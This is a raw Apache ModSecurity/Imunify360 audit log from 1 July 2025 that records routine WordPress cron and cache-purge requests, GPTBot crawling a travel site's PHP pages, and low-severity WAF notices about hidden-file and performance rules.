--dd5f9f1e-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751322363015919 17298 (- - -) Stopwatch2: 1751322363015919 17298; combined=3631, p1=174, p2=3286, p3=0, p4=0, p5=170, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e01ad93e-Z-- --2a456940-A-- [01/Jul/2025:03:56:03.567911 +0530] aGMO-2EG2ak0hLf9TCAsSAAAAAg 103.185.74.40 56782 192.168.74.40 443 --2a456940-B-- POST /wp-cron.php?doing_wp_cron=1751322363.3304018974304199218750 HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --2a456940-C-- --2a456940-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --2a456940-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=7388, p1=171, p2=6506, p3=678, p4=33, p5=0, sr=64, sw=0, l=0, gc=0||Py scan:12357||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751322363544393 24520 (- - -) Stopwatch2: 1751322363544393 24520; combined=7827, p1=171, p2=6506, p3=678, p4=33, p5=438, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2a456940-Z-- --c0056221-A-- [01/Jul/2025:03:56:04.314608 +0530] aGMO_HTj6hSpYek9K0DXMgAAAAk 20.171.207.232 35116 192.168.74.40 443 --c0056221-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/aainag/Rajasthan-Travel-Guides/Ajmer-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c0056221-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323021952061 15555 (- - -) Stopwatch2: 1751323021952061 15555; combined=2776, p1=129, p2=2503, p3=0, p4=0, p5=144, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e4f6a84c-Z-- --9d9d9757-A-- [01/Jul/2025:04:07:02.395859 +0530] aGMRhzqs8dHr60NVOXF1xgAAAAU 103.185.74.40 41564 192.168.74.40 443 --9d9d9757-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --9d9d9757-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9d9d9757-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323015424738 6971719 (- - -) Stopwatch2: 1751323015424738 6971719; combined=2854, p1=131, p2=2519, p3=0, p4=0, p5=204, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9d9d9757-Z-- --6a4ba36e-A-- [01/Jul/2025:04:07:02.427561 +0530] aGMRjPNTxKUticRHUJScBgAAAAM 103.185.74.40 61934 192.168.74.40 443 --6a4ba36e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --6a4ba36e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6a4ba36e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323020426810 2001174 (- - -) Stopwatch2: 1751323020426810 2001174; combined=2144, p1=85, p2=1911, p3=0, p4=0, p5=147, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6a4ba36e-Z-- --7d4f5837-A-- [01/Jul/2025:04:07:03.126440 +0530] aGMRj-sj-2FaVuRVHmG9-gAAABs 20.171.207.232 45198 192.168.74.40 443 --7d4f5837-B-- GET /rajasthan-tours-from-udaipur/aainag/aainag/images/Rajasthan-Travel-Guides/https/js/https/js/photo-gallery.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --7d4f5837-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323185086172 1394186 (- - -) Stopwatch2: 1751323185086172 1394186; combined=3761, p1=95, p2=3360, p3=105, p4=10, p5=190, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3ef5024d-Z-- --926e9a50-A-- [01/Jul/2025:04:09:47.139530 +0530] aGMSMUPDmYBEtrJSU1qAigAAAAM 103.185.74.40 47864 192.168.74.40 443 --926e9a50-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --926e9a50-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --926e9a50-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323185706578 1433714 (- - -) Stopwatch2: 1751323185706578 1433714; combined=2394, p1=127, p2=2073, p3=0, p4=0, p5=194, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --926e9a50-Z-- --d5b9c119-A-- [01/Jul/2025:04:09:47.177941 +0530] aGMSM1liqPByo-SXMIqN8QAAAAA 20.171.207.232 34062 192.168.74.40 443 --d5b9c119-B-- GET /https/aainag/images/testimonials/https/js/rajasthan-tours-from-delhi/aainag/Rajasthan-Travel-Guides/Kota-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d5b9c119-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323187152976 25024 (- - -) Stopwatch2: 1751323187152976 25024; combined=4300, p1=167, p2=3978, p3=0, p4=0, p5=154, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d5b9c119-Z-- --f498b060-A-- [01/Jul/2025:04:09:48.311112 +0530] aGMSM0XOGC-i2apywaVPAAAAAAE 103.185.74.40 52201 192.168.74.40 443 --f498b060-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f498b060-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f498b060-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323187352183 959406 (- - -) Stopwatch2: 1751323187352183 959406; combined=2496, p1=124, p2=2232, p3=0, p4=0, p5=140, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f498b060-Z-- --14ac9826-A-- [01/Jul/2025:04:09:48.353327 +0530] aGMSNFliqPByo-SXMIqN8gAAAAA 20.171.207.232 34062 192.168.74.40 443 --14ac9826-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/aainag/js/js/Rajasthan-Travel-Guides/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --14ac9826-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323194168126 15698 (- - -) Stopwatch2: 1751323194168126 15698; combined=3422, p1=132, p2=3114, p3=0, p4=0, p5=175, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a20e7b3a-Z-- --5b9a2f4f-A-- [01/Jul/2025:04:09:54.527986 +0530] aGMSOfhJyMbl8DbCJOrA6gAAAB4 103.185.74.40 21991 192.168.74.40 443 --5b9a2f4f-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/plugins_loaded Accept: */* Accept-Encoding: deflate, gzip Connection: close --5b9a2f4f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5b9a2f4f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323193468452 1060213 (- - -) Stopwatch2: 1751323193468452 1060213; combined=2217, p1=84, p2=1943, p3=0, p4=0, p5=190, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b9a2f4f-Z-- --1a4cbf2b-A-- [01/Jul/2025:04:09:55.811588 +0530] aGMSOkXOGC-i2apywaVPAwAAAAE 103.185.74.40 47019 192.168.74.40 443 --1a4cbf2b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/plugins_loaded Accept: */* Accept-Encoding: deflate, gzip Connection: close --1a4cbf2b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1a4cbf2b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323194741573 1070911 (- - -) Stopwatch2: 1751323194741573 1070911; combined=3814, p1=128, p2=3522, p3=0, p4=0, p5=163, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1a4cbf2b-Z-- --6b0c5479-A-- [01/Jul/2025:04:09:56.527560 +0530] aGMSPFliqPByo-SXMIqN-QAAAAA 20.171.207.232 34062 192.168.74.40 443 --6b0c5479-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/Rajasthan-Travel-Guides/aainag/Car-Rentals-Ahmedabad.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --6b0c5479-F-- -- Apache-Handler: proxy-server Stopwatch: 1751323198892416 346711 (- - -) Stopwatch2: 1751323198892416 346711; combined=267, p1=90, p2=0, p3=0, p4=0, p5=177, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b9a2f4f-Z-- --99739251-A-- [01/Jul/2025:04:09:59.358828 +0530] aGMSPNH7CP685tBbyXhjDgAAAA0 103.185.74.40 17451 192.168.74.40 443 --99739251-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --99739251-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --99739251-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323196890223 2469338 (- - -) Stopwatch2: 1751323196890223 2469338; combined=3726, p1=220, p2=3289, p3=0, p4=0, p5=217, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --99739251-Z-- --cae4837d-A-- [01/Jul/2025:04:10:00.098677 +0530] aGMSQFliqPByo-SXMIqN_AAAAAA 20.171.207.232 34062 192.168.74.40 443 --cae4837d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/js/Rajasthan-Travel-Guides/Madhya_Pradesh-Destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --cae4837d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323201228929 71814 (- - -) Stopwatch2: 1751323201228929 71814; combined=4548, p1=167, p2=4150, p3=0, p4=0, p5=230, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c0f76448-Z-- --f5347a75-A-- [01/Jul/2025:04:10:01.771301 +0530] aGMSP4lV4jxs_9sxswO4BwAAAAc 103.185.74.40 45226 192.168.74.40 443 --f5347a75-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f5347a75-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f5347a75-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323199572138 2201829 (- - -) Stopwatch2: 1751323199572138 2201829; combined=2529, p1=86, p2=2187, p3=0, p4=0, p5=255, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f5347a75-Z-- --d806415e-A-- [01/Jul/2025:04:10:01.977275 +0530] aGMSQfhJyMbl8DbCJOrA7QAAAB4 124.156.225.181 44748 192.168.74.40 80 --d806415e-B-- GET / HTTP/1.1 Host: pakhi-infosoul.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323479762546 13983 (- - -) Stopwatch2: 1751323479762546 13983; combined=2614, p1=148, p2=2288, p3=0, p4=0, p5=178, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0bc32725-Z-- --809ee109-A-- [01/Jul/2025:04:14:40.311892 +0530] aGMTVjPWr48hgLvWoS3jigAAABE 103.185.74.40 60384 192.168.74.40 443 --809ee109-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --809ee109-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --809ee109-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323478971868 1340330 (- - -) Stopwatch2: 1751323478971868 1340330; combined=2164, p1=83, p2=1895, p3=0, p4=0, p5=186, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --809ee109-Z-- --3bf8cc32-A-- [01/Jul/2025:04:14:41.048034 +0530] aGMTWce2CGXo-t6nHaRBNAAAACE 20.171.207.232 48914 192.168.74.40 443 --3bf8cc32-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-delhi/images/images/js/Rajasthan-Travel-Guides/Agra-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3bf8cc32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3bf8cc32-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323481531177 7891 (- - -) Stopwatch2: 1751323481531177 7891; combined=4990, p1=122, p2=4610, p3=104, p4=3, p5=151, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1f7c823c-Z-- --3d0d5e2d-A-- [01/Jul/2025:04:14:41.721412 +0530] aGMTWP_tNdjORTJYkaY51gAAAAk 103.185.74.40 58179 192.168.74.40 443 --3d0d5e2d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3d0d5e2d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3d0d5e2d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323480523054 1198827 (- - -) Stopwatch2: 1751323480523054 1198827; combined=2086, p1=62, p2=1875, p3=0, p4=0, p5=149, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3d0d5e2d-Z-- --89302245-A-- [01/Jul/2025:04:14:42.158899 +0530] aGMTWse2CGXo-t6nHaRBNQAAACE 20.171.207.232 48914 192.168.74.40 443 --89302245-B-- GET /https/js/rajasthan-tours-from-udaipur/images/aainag/Rajasthan-Travel-Guides/https/aainag/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --89302245-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --89302245-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751323967289859 3534387 (- - -) Stopwatch2: 1751323967289859 3534387; combined=6328, p1=117, p2=5476, p3=276, p4=5, p5=364, sr=140, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cd78d215-Z-- --0b5b1f00-A-- [01/Jul/2025:04:22:51.616401 +0530] aGMVQf9EZv1_DBVMumTd6AAAAA0 103.185.74.40 8560 192.168.74.40 443 --0b5b1f00-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --0b5b1f00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 